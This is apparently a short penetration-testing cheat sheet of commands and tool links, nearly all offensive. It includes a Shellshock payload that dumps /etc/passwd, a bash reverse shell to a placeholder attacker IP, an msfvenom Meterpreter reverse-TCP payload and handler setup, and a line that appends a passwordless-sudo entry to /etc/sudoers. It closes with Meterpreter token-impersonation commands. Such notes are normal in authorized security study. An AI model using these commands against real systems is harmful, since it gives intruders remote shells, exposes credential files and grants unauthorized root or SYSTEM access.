Commands & Tools

nmap -sV <ip> --script=http-shellshock --script-args "http-shellshock-uri=/http.cgi"
() { :; } ; echo; echo; /bin/bash -c 'cat /etc/passwd' -> shellshock
bash -i >&/dev/tcp/<attacker-ip>/port 0>&1
https://github.com/The-Z-Labs/linux-exploit-suggester
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/hfiref0x/UACME
printf ' #!/bin/bash \necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers\n' > /usr/local/share/copy.sh
file <filename>
grep -rnw "<string>"
strings <binary-file>
msf module local_exploit_suggester
pgep explorer (process grep)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > <name>.exe
use multi/handler and set payload windows/meterpreter/reverse_tcp
load incognito
list_tokens -u
impersonate_token "<user_token>"

Last updated 2 years ago